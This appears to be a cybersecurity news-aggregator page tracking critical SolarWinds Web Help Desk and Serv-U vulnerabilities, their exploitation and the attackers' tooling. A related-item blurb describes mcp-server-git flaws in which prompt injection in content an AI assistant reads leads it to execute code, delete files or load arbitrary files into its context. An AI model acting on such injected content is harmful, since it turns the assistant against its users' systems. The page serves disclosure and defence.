CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Multiple Critical Vulnerabilities in SolarWinds Web Help Desk

First reported
Last updated
4 unique sources, 10 articles

Summary

Hide ▲

SolarWinds has released security updates to address multiple critical vulnerabilities in SolarWinds Web Help Desk, including CVE-2025-40536, CVE-2025-40537, CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, and CVE-2025-40554. These vulnerabilities could result in authentication bypass and remote code execution (RCE). CVE-2025-40551 is actively exploited in attacks and has been added to CISA's KEV catalog. SolarWinds Web Help Desk is used by more than 300,000 customers worldwide, including government agencies, large corporations, healthcare organizations, and educational institutions. SolarWinds has also released security updates to patch four critical Serv-U remote code execution vulnerabilities that could grant attackers root access to unpatched servers. The most severe flaw, CVE-2025-40538, allows attackers with high privileges to gain root or admin permissions on vulnerable servers. These vulnerabilities include a broken access control flaw, two type confusion flaws, and an Insecure Direct Object Reference (IDOR) vulnerability. All four vulnerabilities require attackers to already have high privileges on the targeted servers.

Timeline

  1. 24.02.2026 15:00 1 articles · 23h ago

    SolarWinds patches critical Serv-U vulnerabilities

    SolarWinds has released security updates to patch four critical Serv-U remote code execution vulnerabilities, including CVE-2025-40538, which allows attackers with high privileges to gain root or admin permissions on vulnerable servers. The vulnerabilities include a broken access control flaw, two type confusion flaws, and an Insecure Direct Object Reference (IDOR) vulnerability. All four vulnerabilities require attackers to already have high privileges on the targeted servers.

    Show sources
    Open in new tab
  2. 09.02.2026 16:42 3 articles · 15d ago

    Microsoft details multi-stage attacks exploiting SolarWinds Web Help Desk

    Microsoft observed multistage intrusions against WHD instances but couldn't determine whether the attacks exploited recent flaws or older vulnerabilities. The attacks occurred in December 2025 and targeted machines vulnerable to both old and new sets of CVEs. Threat actors used living-off-the-land (LotL) techniques and legitimate administrative tools like Zoho ManageEngine for lateral movement. The compromised service of a WHD instance spawned PowerShell to leverage BITS for payload download and execution. Huntress observed threat actors rapidly deploying Zoho Meetings and Cloudflare tunnels for persistence after gaining access via the WHD instance.

    Show sources
    Open in new tab
  3. 29.01.2026 11:00 7 articles · 27d ago

    SolarWinds releases updates for four critical Web Help Desk flaws

    Threat actors have been exploiting CVE-2025-40551 and CVE-2025-26399 to deploy legitimate tools for malicious purposes, such as Zoho ManageEngine and Velociraptor. The attackers targeted at least three organizations and leveraged Cloudflare tunnels for persistence. The malicious activity was spotted by researchers at Huntress Security and is believed to be part of a campaign that started on January 16. The attackers used Velociraptor for command and control (C2) and Zoho ManageEngine for remote monitoring and management. The attackers installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform and configured the tool for unattended access. They registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. The attackers used Velociraptor as a command-and-control (C2) framework that communicates with attackers via Cloudflare Workers. The attackers used an outdated version of Velociraptor (0.73.4), which is vulnerable to a privilege escalation flaw. The attackers installed Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. The attackers disabled Windows Defender and Firewall via registry modifications to ensure that fetching additional payloads would not be blocked. The attackers downloaded a fresh copy of the VS Code binary approximately a second after disabling Defender. System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product. The Shadowserver Foundation's Internet scans for CVE-2025-40551 show approximately 170 vulnerable WHD instances. Organizations should put their WHD instances behind firewalls or VPNs and remove direct Internet access to administrator paths. Customers should update their WHD instances to version 2026.1 or later and review hosts for any unauthorized remote access tools like Zoho Assist and Velociraptor. Microsoft recommended evicting any remote monitoring and management (RMM) tools in the network like Zoho ManageEngine and rotating credentials for WHD service and administrator accounts.

    Show sources
    Open in new tab
  4. 23.09.2025 15:46 3 articles · 5mo ago

    SolarWinds releases hotfix for critical deserialization vulnerability in Web Help Desk

    The vulnerability is the third attempt to address the original flaw CVE-2024-28986. SolarWinds Web Help Desk is used by medium-to-large organizations for IT support request tracking, workflow automation, asset management, and compliance assurance. The vulnerability affects the AjaxProxy component and is caused by unsafe deserialization handling. The hotfix requires installing Web Help Desk version 12.8.7 and replacing specific JAR files.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support and PRA

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability. Attackers have begun actively exploiting the CVE-2026-1731 vulnerability in the wild, abusing the get_portal_info endpoint to extract the x-ns-company value before establishing a WebSocket channel. A proof-of-concept exploit targeting the /get_portal_info endpoint was published on GitHub. Threat actors have been observed exploiting CVE-2026-1731 to conduct network reconnaissance, deploy web shells, establish command-and-control (C2) channels, install backdoors and remote management tools, perform lateral movement, and exfiltrate data. The attacks have targeted financial services, legal services, high technology, higher education, wholesale and retail, and healthcare sectors across the U.S., France, Germany, Australia, and Canada. The vulnerability enables attackers to inject and execute arbitrary shell commands via the affected 'thin-scc-wrapper' script through the WebSocket interface. Attackers have deployed multiple web shells, including a PHP backdoor and a bash dropper, to maintain persistent access. Malware such as VShell and Spark RAT have been deployed as part of the exploitation. Out-of-band application security testing (OAST) techniques have been used to validate successful code execution and fingerprint compromised systems. Sensitive data, including configuration files, internal system databases, and a full PostgreSQL dump, have been exfiltrated to an external server. CVE-2026-1731 and CVE-2024-12356 share a common issue with input validation within distinct execution pathways. CVE-2026-1731 could be a target for sophisticated threat actors, similar to CVE-2024-12356 which was exploited by China-nexus threat actors like Silk Typhoon. CISA has confirmed that CVE-2026-1731 has been exploited in ransomware campaigns. CISA added CVE-2026-1731 to its Known Exploited Vulnerabilities (KEV) catalog on February 13 and gave federal agencies three days to apply the patch or stop using the product. Proof-of-concept (PoC) exploits for CVE-2026-1731 became available shortly after the initial disclosure, and exploitation was detected on January 31, making it a zero-day vulnerability for at least a week. CISA has activated the 'Known To Be Used in Ransomware Campaigns?' indicator in the KEV catalog for CVE-2026-1731. Customers of the cloud-based application (SaaS) had the patch applied automatically on February 2. Self-hosted instance customers need to either enable automatic updates or manually install the patch. For Remote Support, the recommended version is 25.3.2. For Privileged Remote Access, the recommended version is 25.1.1 or newer. Customers still using RS v21.3 and PRA v22.1 are recommended to upgrade to a newer version before applying the patch.

Open in new tab

Critical Authentication Bypass and RCE Flaws in SolarWinds Web Help Desk

SolarWinds has released patches for critical vulnerabilities in its Web Help Desk software, including authentication bypass and remote code execution (RCE) flaws. The vulnerabilities, reported by security researchers, can be exploited by unauthenticated attackers in low-complexity attacks. The company advises immediate patching due to the high risk of exploitation.

Open in new tab

Three Flaws in Anthropic MCP Git Server Enable File Access and Code Execution

Three vulnerabilities in the mcp-server-git, maintained by Anthropic, allow file access, deletion, and code execution via prompt injection. The flaws have been addressed in versions 2025.9.25 and 2025.12.18. The vulnerabilities include path traversal and argument injection issues that can be exploited to manipulate Git repositories and execute arbitrary code. The issues were disclosed by Cyata researcher Yarden Porat, highlighting the risks of prompt injection attacks without direct system access. The vulnerabilities affect all versions of mcp-server-git released before December 8, 2025, and apply to default installations. An attacker only needs to influence what an AI assistant reads to trigger the vulnerabilities. The flaws allow attackers to execute code, delete arbitrary files, and load arbitrary files into a large language model's context. While the vulnerabilities do not directly exfiltrate data, sensitive files may still be exposed to the AI, creating downstream security and privacy risks. The vulnerabilities have been assigned CVE-2025-68143, CVE-2025-68144, and CVE-2025-68145.

Open in new tab

Critical RCE Flaw in Trend Micro Apex Central On-Prem Windows

Trend Micro has addressed critical vulnerabilities in on-premise Windows versions of Apex Central, including a remote code execution (RCE) flaw (CVE-2025-69258) with a CVSS score of 9.8. The flaw allows unauthenticated remote attackers to execute arbitrary code under SYSTEM context. Two additional flaws (CVE-2025-69259, CVE-2025-69260) with CVSS scores of 7.5 each can cause denial-of-service conditions. The vulnerabilities affect versions below Build 7190 and require physical or remote access to exploit. Apex Central is a web-based management console that helps admins manage multiple Trend Micro products and services, including antivirus, content security, and threat detection. Trend Micro has released Critical Patch Build 7190 to address these vulnerabilities.

Open in new tab

CISA Adds Actively Exploited Microsoft Office and HPE OneView Vulnerabilities to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities affecting Microsoft Office and HPE OneView to its Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation. The vulnerabilities include CVE-2009-0556 in Microsoft Office PowerPoint and CVE-2025-37164 in HPE OneView. The flaws allow for remote code execution and memory corruption. CISA urges federal agencies to apply patches by January 28, 2026, to mitigate risks. A proof-of-concept (PoC) exploit for CVE-2025-37164 has been publicly released, increasing the risk of exploitation.

Open in new tab